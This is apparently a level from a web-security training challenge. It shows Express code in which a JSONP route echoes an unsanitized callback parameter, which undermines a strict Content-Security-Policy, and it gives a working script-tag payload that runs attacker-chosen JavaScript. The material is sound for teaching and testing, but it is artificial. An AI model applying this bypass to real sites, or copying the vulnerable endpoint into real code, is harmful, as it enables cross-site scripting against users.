Level 2: CSP Bypass via Trusted JSONP
MISSION: A strict CSP blocks inline scripts. Find a way to execute JS using the whitelisted API endpoint.
CSP: script-src 'self';
/// SOURCE CODE INSPECTOR ///
// 1. Strict CSP is set on the page
res.setHeader("Content-Security-Policy", "default-src 'none'; script-src 'self'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com; font-src https://fonts.gstatic.com;");
// 2. But the page trusts endpoints on 'self', including this JSONP route
app.get('/level2/api/jsonp', (req, res) => {
const callback = req.query.callback || 'console.log';
res.type('application/javascript');
// The callback parameter is reflected directly into the JS response!
res.send(callback + '({"status": "ok"});');
});/// DECRYPTION COMPLETE ///
The CSP blocks inline scripts, but allows scripts loaded from self (the same domain). Because there is an open JSONP endpoint that reflects the callback parameter without sanitization, we can point a script tag at it and execute code.
Payload:
<script src="/level2/api/jsonp?callback=alert(1)//"></script>